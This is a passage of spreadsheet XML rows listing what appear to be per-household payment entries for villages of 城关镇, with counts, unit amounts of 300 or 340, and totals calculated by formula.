      <c r="J318" s="14"/>
      <c r="K318" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="319" ht="23" customHeight="1" spans="1:11">
      <c r="A319" s="13" t="s">
        <v>995</v>
      </c>
      <c r="B319" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C319" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D319" s="14" t="s">
        <v>996</v>
      </c>
      <c r="E319" s="14" t="s">
        <v>997</v>
      </c>
      <c r="F319" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G319" s="14">
        <v>2</v>
      </c>
      <c r="H319" s="14">
        <v>300</v>
      </c>
      <c r="I319" s="14">
        <f>H319*G319</f>
        <v>600</v>
      </c>
      <c r="J319" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K319" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="320" ht="23" customHeight="1" spans="1:11">
      <c r="A320" s="13" t="s">
        <v>998</v>
      </c>
      <c r="B320" s="14" t="str">
        <f>B319</f>
        <v>城关镇</v>
      </c>
      <c r="C320" s="14" t="str">
        <f>C319</f>
        <v>中华村</v>
      </c>
      <c r="D320" s="13" t="s">
        <v>999</v>
      </c>
      <c r="E320" s="13" t="s">
        <v>786</v>
      </c>
      <c r="F320" s="14" t="str">
        <f>F319</f>
        <v>4113210108</v>
      </c>
      <c r="G320" s="14"/>
      <c r="H320" s="14"/>
      <c r="I320" s="14"/>
      <c r="J320" s="14"/>
      <c r="K320" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="321" ht="23" customHeight="1" spans="1:11">
      <c r="A321" s="13" t="s">
        <v>1000</v>
      </c>
      <c r="B321" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C321" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D321" s="14" t="s">
        <v>1001</v>
      </c>
      <c r="E321" s="14" t="s">
        <v>1002</v>
      </c>
      <c r="F321" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G321" s="14">
        <v>1</v>
      </c>
      <c r="H321" s="14">
        <v>340</v>
      </c>
      <c r="I321" s="14">
        <f>H321*G321</f>
        <v>340</v>
      </c>
      <c r="J321" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K321" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="322" ht="23" customHeight="1" spans="1:11">
      <c r="A322" s="13" t="s">
        <v>1003</v>
      </c>
      <c r="B322" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C322" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D322" s="14" t="s">
        <v>1004</v>
      </c>
      <c r="E322" s="14" t="s">
        <v>484</v>
      </c>
      <c r="F322" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G322" s="14">
        <v>2</v>
      </c>
      <c r="H322" s="14">
        <v>300</v>
      </c>
      <c r="I322" s="14">
        <f>H322*G322</f>
        <v>600</v>
      </c>
      <c r="J322" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K322" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="323" ht="23" customHeight="1" spans="1:11">
      <c r="A323" s="13" t="s">
        <v>1005</v>
      </c>
      <c r="B323" s="14" t="str">
        <f>B322</f>
        <v>城关镇</v>
      </c>
      <c r="C323" s="14" t="str">
        <f>C322</f>
        <v>北外村</v>
      </c>
      <c r="D323" s="13" t="s">
        <v>1006</v>
      </c>
      <c r="E323" s="13" t="s">
        <v>502</v>
      </c>
      <c r="F323" s="14" t="str">
        <f>F322</f>
        <v>4113210102</v>
      </c>
      <c r="G323" s="14"/>
      <c r="H323" s="14"/>
      <c r="I323" s="14"/>
      <c r="J323" s="14"/>
      <c r="K323" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="324" ht="23" customHeight="1" spans="1:11">
      <c r="A324" s="13" t="s">
        <v>1007</v>
      </c>
      <c r="B324" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C324" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D324" s="14" t="s">
        <v>1008</v>
      </c>
      <c r="E324" s="14" t="s">
        <v>1009</v>
      </c>
      <c r="F324" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G324" s="14">
        <v>2</v>
      </c>
      <c r="H324" s="14">
        <v>300</v>
      </c>
      <c r="I324" s="14">
        <f>H324*G324</f>
        <v>600</v>
      </c>
      <c r="J324" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K324" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="325" ht="23" customHeight="1" spans="1:11">
      <c r="A325" s="13" t="s">
        <v>1010</v>
      </c>
      <c r="B325" s="14" t="str">
        <f>B324</f>
        <v>城关镇</v>
      </c>
      <c r="C325" s="14" t="str">
        <f>C324</f>
        <v>北外村</v>
      </c>
      <c r="D325" s="13" t="s">
        <v>1011</v>
      </c>
      <c r="E325" s="13" t="s">
        <v>1012</v>
      </c>
      <c r="F325" s="14" t="str">
        <f>F324</f>
        <v>4113210102</v>
      </c>
      <c r="G325" s="14"/>
      <c r="H325" s="14"/>
      <c r="I325" s="14"/>
      <c r="J325" s="14"/>
      <c r="K325" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="326" ht="23" customHeight="1" spans="1:11">
      <c r="A326" s="13" t="s">
        <v>1013</v>
      </c>
      <c r="B326" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C326" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D326" s="14" t="s">
        <v>1014</v>
      </c>
      <c r="E326" s="14" t="s">
        <v>323</v>
      </c>
      <c r="F326" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G326" s="14">
        <v>1</v>
      </c>
      <c r="H326" s="14">
        <v>340</v>
      </c>
      <c r="I326" s="14">
        <f>H326*G326</f>
        <v>340</v>
      </c>
      <c r="J326" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K326" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="327" ht="23" customHeight="1" spans="1:11">
      <c r="A327" s="13" t="s">
        <v>1015</v>
      </c>
      <c r="B327" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C327" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D327" s="14" t="s">
        <v>1016</v>
      </c>
      <c r="E327" s="14" t="s">
        <v>222</v>
      </c>
      <c r="F327" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G327" s="14">
        <v>2</v>
      </c>
      <c r="H327" s="14">
        <v>300</v>
      </c>
      <c r="I327" s="14">
        <f>H327*G327</f>
        <v>600</v>
      </c>
      <c r="J327" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K327" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="328" ht="23" customHeight="1" spans="1:11">
      <c r="A328" s="13" t="s">
        <v>1017</v>
      </c>
      <c r="B328" s="14" t="str">
        <f>B327</f>
        <v>城关镇</v>
      </c>
      <c r="C328" s="14" t="str">
        <f>C327</f>
        <v>中华村</v>
      </c>
      <c r="D328" s="13" t="s">
        <v>1018</v>
      </c>
      <c r="E328" s="13" t="s">
        <v>744</v>
      </c>
      <c r="F328" s="14" t="str">
        <f>F327</f>
        <v>4113210108</v>
      </c>
      <c r="G328" s="14"/>
      <c r="H328" s="14"/>
      <c r="I328" s="14"/>
      <c r="J328" s="14"/>
      <c r="K328" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="329" ht="23" customHeight="1" spans="1:11">
      <c r="A329" s="13" t="s">
        <v>1019</v>
      </c>
      <c r="B329" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C329" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D329" s="14" t="s">
        <v>1020</v>
      </c>
      <c r="E329" s="14" t="s">
        <v>502</v>
      </c>
      <c r="F329" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G329" s="14">
        <v>1</v>
      </c>
      <c r="H329" s="14">
        <v>340</v>
      </c>
      <c r="I329" s="14">
        <f>H329*G329</f>
        <v>340</v>
      </c>
      <c r="J329" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K329" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="330" ht="23" customHeight="1" spans="1:11">
      <c r="A330" s="13" t="s">
        <v>1021</v>
      </c>
      <c r="B330" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C330" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D330" s="14" t="s">
        <v>1022</v>
      </c>
      <c r="E330" s="14" t="s">
        <v>435</v>
      </c>
      <c r="F330" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G330" s="14">
        <v>1</v>
      </c>
      <c r="H330" s="14">
        <v>340</v>
      </c>
      <c r="I330" s="14">
        <f>H330*G330</f>
        <v>340</v>
      </c>
      <c r="J330" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K330" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="331" ht="23" customHeight="1" spans="1:11">
      <c r="A331" s="13" t="s">
        <v>1023</v>
      </c>
      <c r="B331" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C331" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D331" s="14" t="s">
        <v>1024</v>
      </c>
      <c r="E331" s="14" t="s">
        <v>502</v>
      </c>
      <c r="F331" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G331" s="14">
        <v>1</v>
      </c>
      <c r="H331" s="14">
        <v>340</v>
      </c>
      <c r="I331" s="14">
        <f>H331*G331</f>
        <v>340</v>
      </c>
      <c r="J331" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K331" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="332" ht="23" customHeight="1" spans="1:11">
      <c r="A332" s="13" t="s">
        <v>1025</v>
      </c>
      <c r="B332" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C332" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D332" s="14" t="s">
        <v>1026</v>
      </c>
      <c r="E332" s="14" t="s">
        <v>484</v>
      </c>
      <c r="F332" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G332" s="14">
        <v>2</v>
      </c>
      <c r="H332" s="14">
        <v>300</v>
      </c>
      <c r="I332" s="14">
        <f>H332*G332</f>
        <v>600</v>
      </c>
      <c r="J332" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K332" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="333" ht="23" customHeight="1" spans="1:11">
      <c r="A333" s="13" t="s">
        <v>1027</v>
      </c>
      <c r="B333" s="14" t="str">
        <f>B332</f>
        <v>城关镇</v>
      </c>
      <c r="C333" s="14" t="str">
        <f>C332</f>
        <v>中华村</v>
      </c>
      <c r="D333" s="13" t="s">
        <v>1028</v>
      </c>
      <c r="E333" s="13" t="s">
        <v>1029</v>
      </c>
      <c r="F333" s="14" t="str">
        <f>F332</f>
        <v>4113210108</v>
      </c>
      <c r="G333" s="14"/>
      <c r="H333" s="14"/>
      <c r="I333" s="14"/>
      <c r="J333" s="14"/>
      <c r="K333" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="334" ht="23" customHeight="1" spans="1:11">
      <c r="A334" s="13" t="s">
        <v>1030</v>
      </c>
      <c r="B334" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C334" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D334" s="14" t="s">
        <v>1031</v>
      </c>
      <c r="E334" s="14" t="s">
        <v>385</v>
      </c>
      <c r="F334" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G334" s="14">
        <v>2</v>
      </c>
      <c r="H334" s="14">
        <v>300</v>
      </c>
      <c r="I334" s="14">
        <f>H334*G334</f>
        <v>600</v>
      </c>
      <c r="J334" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K334" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="335" ht="23" customHeight="1" spans="1:11">
      <c r="A335" s="13" t="s">
        <v>1032</v>
      </c>
      <c r="B335" s="14" t="str">
        <f>B334</f>
        <v>城关镇</v>
      </c>
      <c r="C335" s="14" t="str">
        <f>C334</f>
        <v>北外村</v>
      </c>
      <c r="D335" s="13" t="s">
        <v>1033</v>
      </c>
      <c r="E335" s="13" t="s">
        <v>239</v>
      </c>
      <c r="F335" s="14" t="str">
        <f>F334</f>
        <v>4113210102</v>
      </c>
      <c r="G335" s="14"/>
      <c r="H335" s="14"/>
      <c r="I335" s="14"/>
      <c r="J335" s="14"/>
      <c r="K335" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="336" ht="23" customHeight="1" spans="1:11">
      <c r="A336" s="13" t="s">
        <v>1034</v>
      </c>
      <c r="B336" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C336" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D336" s="14" t="s">
        <v>1035</v>
      </c>
      <c r="E336" s="14" t="s">
        <v>273</v>
      </c>
      <c r="F336" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G336" s="14">
        <v>1</v>
      </c>
      <c r="H336" s="14">
        <v>340</v>
      </c>
      <c r="I336" s="14">
        <f t="shared" ref="I336:I346" si="12">H336*G336</f>
        <v>340</v>
      </c>
      <c r="J336" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K336" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="337" ht="23" customHeight="1" spans="1:11">
      <c r="A337" s="13" t="s">
        <v>1036</v>
      </c>
      <c r="B337" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C337" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D337" s="14" t="s">
        <v>1037</v>
      </c>
      <c r="E337" s="14" t="s">
        <v>1038</v>
      </c>
      <c r="F337" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G337" s="14">
        <v>1</v>
      </c>
      <c r="H337" s="14">
        <v>340</v>
      </c>
      <c r="I337" s="14">
        <f t="shared" si="12"/>
        <v>340</v>
      </c>
      <c r="J337" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K337" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="338" ht="23" customHeight="1" spans="1:11">
      <c r="A338" s="13" t="s">
        <v>1039</v>
      </c>
      <c r="B338" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C338" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D338" s="14" t="s">
        <v>1040</v>
      </c>
      <c r="E338" s="14" t="s">
        <v>312</v>
      </c>
      <c r="F338" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G338" s="14">
        <v>1</v>
      </c>
      <c r="H338" s="14">
        <v>340</v>
      </c>
      <c r="I338" s="14">
        <f t="shared" si="12"/>
        <v>340</v>
      </c>
      <c r="J338" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K338" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="339" ht="23" customHeight="1" spans="1:11">
      <c r="A339" s="13" t="s">
        <v>1041</v>
      </c>
      <c r="B339" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C339" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D339" s="14" t="s">
        <v>1042</v>
      </c>
      <c r="E339" s="14" t="s">
        <v>744</v>
      </c>
      <c r="F339" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G339" s="14">
        <v>1</v>
      </c>
      <c r="H339" s="14">
        <v>340</v>
      </c>
      <c r="I339" s="14">
        <f t="shared" si="12"/>
        <v>340</v>
      </c>
      <c r="J339" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K339" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="340" ht="23" customHeight="1" spans="1:11">
      <c r="A340" s="13" t="s">
        <v>1043</v>
      </c>
      <c r="B340" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C340" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D340" s="14" t="s">
        <v>1044</v>
      </c>
      <c r="E340" s="14" t="s">
        <v>883</v>
      </c>
      <c r="F340" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G340" s="14">
        <v>1</v>
      </c>
      <c r="H340" s="14">
        <v>340</v>
      </c>
      <c r="I340" s="14">
        <f t="shared" si="12"/>
        <v>340</v>
      </c>
      <c r="J340" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K340" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="341" ht="23" customHeight="1" spans="1:11">
      <c r="A341" s="13" t="s">
        <v>1045</v>
      </c>
      <c r="B341" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C341" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D341" s="14" t="s">
        <v>1046</v>
      </c>
      <c r="E341" s="14" t="s">
        <v>265</v>
      </c>
      <c r="F341" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G341" s="14">
        <v>1</v>
      </c>
      <c r="H341" s="14">
        <v>340</v>
      </c>
      <c r="I341" s="14">
        <f t="shared" si="12"/>
        <v>340</v>
      </c>
      <c r="J341" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K341" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="342" ht="23" customHeight="1" spans="1:11">
      <c r="A342" s="13" t="s">
        <v>1047</v>
      </c>
      <c r="B342" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C342" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D342" s="14" t="s">
        <v>1048</v>
      </c>
      <c r="E342" s="14" t="s">
        <v>273</v>
      </c>
      <c r="F342" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G342" s="14">
        <v>1</v>
      </c>
      <c r="H342" s="14">
        <v>340</v>
      </c>
      <c r="I342" s="14">
        <f t="shared" si="12"/>
        <v>340</v>
      </c>
      <c r="J342" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K342" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="343" ht="23" customHeight="1" spans="1:11">
      <c r="A343" s="13" t="s">
        <v>1049</v>
      </c>
      <c r="B343" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C343" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D343" s="14" t="s">
        <v>1050</v>
      </c>
      <c r="E343" s="14" t="s">
        <v>334</v>
      </c>
      <c r="F343" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G343" s="14">
        <v>1</v>
      </c>
      <c r="H343" s="14">
        <v>340</v>
      </c>
      <c r="I343" s="14">
        <f t="shared" si="12"/>
        <v>340</v>
      </c>
      <c r="J343" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K343" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="344" ht="23" customHeight="1" spans="1:11">
      <c r="A344" s="13" t="s">
        <v>1051</v>
      </c>
      <c r="B344" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C344" s="14" t="s">
        <v>318</v>
      </c>
      <c r="D344" s="14" t="s">
        <v>1052</v>
      </c>
      <c r="E344" s="14" t="s">
        <v>1053</v>
      </c>
      <c r="F344" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G344" s="14">
        <v>1</v>
      </c>
      <c r="H344" s="14">
        <v>340</v>
      </c>
      <c r="I344" s="14">
        <f t="shared" si="12"/>
        <v>340</v>
      </c>
      <c r="J344" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K344" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="345" ht="23" customHeight="1" spans="1:11">
      <c r="A345" s="13" t="s">
        <v>1054</v>
      </c>
      <c r="B345" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C345" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D345" s="14" t="s">
        <v>1055</v>
      </c>
      <c r="E345" s="14" t="s">
        <v>499</v>
      </c>
      <c r="F345" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G345" s="14">
        <v>1</v>
      </c>
      <c r="H345" s="14">
        <v>340</v>
      </c>
      <c r="I345" s="14">
        <f t="shared" si="12"/>
        <v>340</v>
      </c>
      <c r="J345" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K345" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="346" ht="23" customHeight="1" spans="1:11">
      <c r="A346" s="13" t="s">
        <v>1056</v>
      </c>
      <c r="B346" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C346" s="14" t="s">
        <v>318</v>
      </c>
      <c r="D346" s="14" t="s">
        <v>1057</v>
      </c>
      <c r="E346" s="14" t="s">
        <v>222</v>
      </c>
      <c r="F346" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G346" s="14">
        <v>2</v>
      </c>
      <c r="H346" s="14">
        <v>300</v>
      </c>
      <c r="I346" s="14">
        <f t="shared" si="12"/>
        <v>600</v>
      </c>
      <c r="J346" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K346" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="347" ht="23" customHeight="1" spans="1:11">
      <c r="A347" s="13" t="s">
        <v>1058</v>
      </c>
      <c r="B347" s="14" t="str">
        <f>B346</f>
        <v>城关镇</v>
      </c>
      <c r="C347" s="14" t="str">
        <f>C346</f>
        <v>东北一组</v>
      </c>
      <c r="D347" s="13" t="s">
        <v>1059</v>
      </c>
      <c r="E347" s="13" t="s">
        <v>288</v>
      </c>
      <c r="F347" s="14" t="str">
        <f>F346</f>
        <v>4113210103</v>
      </c>
      <c r="G347" s="14"/>
      <c r="H347" s="14"/>
      <c r="I347" s="14"/>
      <c r="J347" s="14"/>
      <c r="K347" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="348" ht="23" customHeight="1" spans="1:11">
      <c r="A348" s="13" t="s">
        <v>1060</v>
      </c>
      <c r="B348" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C348" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D348" s="14" t="s">
        <v>1061</v>
      </c>
      <c r="E348" s="14" t="s">
        <v>975</v>
      </c>
      <c r="F348" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G348" s="14">
        <v>1</v>
      </c>
      <c r="H348" s="14">
        <v>340</v>
      </c>
      <c r="I348" s="14">
        <f>H348*G348</f>
        <v>340</v>
      </c>
      <c r="J348" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K348" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="349" ht="23" customHeight="1" spans="1:11">
      <c r="A349" s="13" t="s">
        <v>1062</v>
      </c>
      <c r="B349" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C349" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D349" s="14" t="s">
        <v>1063</v>
      </c>
      <c r="E349" s="14" t="s">
        <v>972</v>
      </c>
      <c r="F349" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G349" s="14">
        <v>2</v>
      </c>
      <c r="H349" s="14">
        <v>300</v>
      </c>
      <c r="I349" s="14">
        <f>H349*G349</f>
        <v>600</v>
      </c>
      <c r="J349" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K349" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="350" ht="23" customHeight="1" spans="1:11">
      <c r="A350" s="13" t="s">
        <v>1064</v>
      </c>
      <c r="B350" s="14" t="str">
        <f>B349</f>
        <v>城关镇</v>
      </c>
      <c r="C350" s="14" t="str">
        <f>C349</f>
        <v>中华村</v>
      </c>
      <c r="D350" s="17" t="s">
        <v>1065</v>
      </c>
      <c r="E350" s="17" t="s">
        <v>1066</v>
      </c>
      <c r="F350" s="14" t="str">
        <f>F349</f>
        <v>4113210108</v>
      </c>
      <c r="G350" s="14"/>
      <c r="H350" s="14"/>
      <c r="I350" s="14"/>
      <c r="J350" s="14"/>
      <c r="K350" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="351" ht="23" customHeight="1" spans="1:11">
      <c r="A351" s="13" t="s">
        <v>1067</v>
      </c>
      <c r="B351" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C351" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D351" s="14" t="s">
        <v>1068</v>
      </c>
      <c r="E351" s="14" t="s">
        <v>320</v>
      </c>
      <c r="F351" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G351" s="14">
        <v>1</v>
      </c>
      <c r="H351" s="14">
        <v>340</v>
      </c>
      <c r="I351" s="14">
        <f t="shared" ref="I351:I360" si="13">H351*G351</f>
        <v>340</v>
      </c>
      <c r="J351" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K351" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="352" ht="23" customHeight="1" spans="1:11">
      <c r="A352" s="13" t="s">
        <v>1069</v>
      </c>
      <c r="B352" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C352" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D352" s="14" t="s">
        <v>1070</v>
      </c>
      <c r="E352" s="14" t="s">
        <v>637</v>
      </c>
      <c r="F352" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G352" s="14">
        <v>1</v>
      </c>
      <c r="H352" s="14">
        <v>340</v>
      </c>
      <c r="I352" s="14">
        <f t="shared" si="13"/>
        <v>340</v>
      </c>
      <c r="J352" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K352" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="353" ht="23" customHeight="1" spans="1:11">
      <c r="A353" s="13" t="s">
        <v>1071</v>
      </c>
      <c r="B353" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C353" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D353" s="14" t="s">
        <v>1072</v>
      </c>
      <c r="E353" s="14" t="s">
        <v>340</v>
      </c>
      <c r="F353" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G353" s="14">
        <v>1</v>
      </c>
      <c r="H353" s="14">
        <v>340</v>
      </c>
      <c r="I353" s="14">
        <f t="shared" si="13"/>
        <v>340</v>
      </c>
      <c r="J353" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K353" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="354" ht="23" customHeight="1" spans="1:11">
      <c r="A354" s="13" t="s">
        <v>1073</v>
      </c>
      <c r="B354" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C354" s="14" t="s">
        <v>318</v>
      </c>
      <c r="D354" s="14" t="s">
        <v>846</v>
      </c>
      <c r="E354" s="14" t="s">
        <v>320</v>
      </c>
      <c r="F354" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G354" s="14">
        <v>1</v>
      </c>
      <c r="H354" s="14">
        <v>340</v>
      </c>
      <c r="I354" s="14">
        <f t="shared" si="13"/>
        <v>340</v>
      </c>
      <c r="J354" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K354" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="355" ht="23" customHeight="1" spans="1:11">
      <c r="A355" s="13" t="s">
        <v>1074</v>
      </c>
      <c r="B355" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C355" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D355" s="14" t="s">
        <v>994</v>
      </c>
      <c r="E355" s="14" t="s">
        <v>273</v>
      </c>
      <c r="F355" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G355" s="14">
        <v>1</v>
      </c>
      <c r="H355" s="14">
        <v>340</v>
      </c>
      <c r="I355" s="14">
        <f t="shared" si="13"/>
        <v>340</v>
      </c>
      <c r="J355" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K355" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="356" ht="23" customHeight="1" spans="1:11">
      <c r="A356" s="13" t="s">
        <v>1075</v>
      </c>
      <c r="B356" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C356" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D356" s="14" t="s">
        <v>1076</v>
      </c>
      <c r="E356" s="14" t="s">
        <v>502</v>
      </c>
      <c r="F356" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G356" s="14">
        <v>1</v>
      </c>
      <c r="H356" s="14">
        <v>340</v>
      </c>
      <c r="I356" s="14">
        <f t="shared" si="13"/>
        <v>340</v>
      </c>
      <c r="J356" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K356" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="357" ht="23" customHeight="1" spans="1:11">
      <c r="A357" s="13" t="s">
        <v>1077</v>
      </c>
      <c r="B357" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C357" s="14" t="s">
        <v>647</v>
      </c>
      <c r="D357" s="14" t="s">
        <v>1078</v>
      </c>
      <c r="E357" s="14" t="s">
        <v>1079</v>
      </c>
      <c r="F357" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G357" s="14">
        <v>1</v>
      </c>
      <c r="H357" s="14">
        <v>340</v>
      </c>
      <c r="I357" s="14">
        <f t="shared" si="13"/>
        <v>340</v>
      </c>
      <c r="J357" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K357" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="358" ht="23" customHeight="1" spans="1:11">
      <c r="A358" s="13" t="s">
        <v>1080</v>
      </c>
      <c r="B358" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C358" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D358" s="14" t="s">
        <v>1081</v>
      </c>
      <c r="E358" s="14" t="s">
        <v>1082</v>
      </c>
      <c r="F358" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G358" s="14">
        <v>1</v>
      </c>
      <c r="H358" s="14">
        <v>340</v>
      </c>
      <c r="I358" s="14">
        <f t="shared" si="13"/>
        <v>340</v>
      </c>
      <c r="J358" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K358" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="359" ht="23" customHeight="1" spans="1:11">
      <c r="A359" s="13" t="s">
